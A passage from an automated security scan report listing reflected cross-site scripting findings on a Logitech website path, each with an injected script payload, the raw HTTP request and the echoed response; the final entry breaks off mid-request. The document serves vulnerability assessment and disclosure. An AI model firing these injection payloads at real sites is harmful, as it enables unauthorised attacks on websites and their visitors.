           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.51. http://www.logitech.com/assets/30737/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/30737/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8cf7b</script><script>alert(1)</script>5f3bd9197d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /8cf7b</script><script>alert(1)</script>5f3bd9197d2/30737/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','8cf7b</script><script>alert(1)</script>5f3bd9197d2/30737' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.52. http://www.logitech.com/assets/30737/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/30737/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8fa4"><script>alert(1)</script>2bfbd23abf8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /b8fa4"><script>alert(1)</script>2bfbd23abf8/30737/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="b8fa4"><script>alert(1)</script>2bfbd23abf8/30737">
...[SNIP]...

1.53. http://www.logitech.com/assets/30814/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/30814/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 873d6"><script>alert(1)</script>9ec4963de81 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /873d6"><script>alert(1)</script>9ec4963de81/30814/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="873d6"><script>alert(1)</script>9ec4963de81/30814">
...[SNIP]...

1.54. http://www.logitech.com/assets/30814/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/30814/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3259</script><script>alert(1)</script>3a9e91f1d98 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c3259</script><script>alert(1)</script>3a9e91f1d98/30814/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','c3259</script><script>alert(1)</script>3a9e91f1d98/30814' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.55. http://www.logitech.com/assets/31147/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31147/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cbf7"><script>alert(1)</script>9dbad03446c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /8cbf7"><script>alert(1)</script>9dbad03446c/31147/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="8cbf7"><script>alert(1)</script>9dbad03446c/31147">
...[SNIP]...

1.56. http://www.logitech.com/assets/31147/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31147/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dfec6</script><script>alert(1)</script>6b1531269f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dfec6</script><script>alert(1)</script>6b1531269f5/31147/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','dfec6</script><script>alert(1)</script>6b1531269f5/31147' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.57. http://www.logitech.com/assets/31148/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31148/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f8154</script><script>alert(1)</script>000448d7f83 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /f8154</script><script>alert(1)</script>000448d7f83/31148/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','f8154</script><script>alert(1)</script>000448d7f83/31148' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.58. http://www.logitech.com/assets/31148/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31148/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64dd6"><script>alert(1)</script>88847320300 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /64dd6"><script>alert(1)</script>88847320300/31148/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="64dd6"><script>alert(1)</script>88847320300/31148">
...[SNIP]...

1.59. http://www.logitech.com/assets/31151/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31151/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3e90</script><script>alert(1)</script>8c4d73a7c92 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /d3e90</script><script>alert(1)</script>8c4d73a7c92/31151/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','d3e90</script><script>alert(1)</script>8c4d73a7c92/31151' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.60. http://www.logitech.com/assets/31151/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31151/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 138f5"><script>alert(1)</script>41212ac5e5d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /138f5"><script>alert(1)</script>41212ac5e5d/31151/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="138f5"><script>alert(1)</script>41212ac5e5d/31151">
...[SNIP]...

1.61. http://www.logitech.com/assets/31156/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31156/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e76ed</script><script>alert(1)</script>0a7cb6d3eaa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /e76ed</script><script>alert(1)</script>0a7cb6d3eaa/31156/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','e76ed</script><script>alert(1)</script>0a7cb6d3eaa/31156' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.62. http://www.logitech.com/assets/31156/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31156/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44030"><script>alert(1)</script>758a22a1891 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /44030"><script>alert(1)</script>758a22a1891/31156/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="44030"><script>alert(1)</script>758a22a1891/31156">
...[SNIP]...

1.63. http://www.logitech.com/assets/31159/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31159/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ff0c</script><script>alert(1)</script>cd569d55617 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /9ff0c</script><script>alert(1)</script>cd569d55617/31159/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','9ff0c</script><script>alert(1)</script>cd569d55617/31159' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.64. http://www.logitech.com/assets/31159/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31159/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72107"><script>alert(1)</script>dc267133a52 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /72107"><script>alert(1)</script>dc267133a52/31159/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="72107"><script>alert(1)</script>dc267133a52/31159">
...[SNIP]...

1.65. http://www.logitech.com/assets/31161/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31161/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b388</script><script>alert(1)</script>2fdf704614a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /8b388</script><script>alert(1)</script>2fdf704614a/31161/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','8b388</script><script>alert(1)</script>2fdf704614a/31161' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.66. http://www.logitech.com/assets/31161/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31161/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d5a8"><script>alert(1)</script>e902e39d808 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /9d5a8"><script>alert(1)</script>e902e39d808/31161/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="9d5a8"><script>alert(1)</script>e902e39d808/31161">
...[SNIP]...

1.67. http://www.logitech.com/assets/31162/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31162/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74280</script><script>alert(1)</script>625fc2ddf1b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /74280</script><script>alert(1)</script>625fc2ddf1b/31162/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','74280</script><script>alert(1)</script>625fc2ddf1b/31162' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.68. http://www.logitech.com/assets/31162/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31162/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9b4e"><script>alert(1)</script>56ef9aed460 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /b9b4e"><script>alert(1)</script>56ef9aed460/31162/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
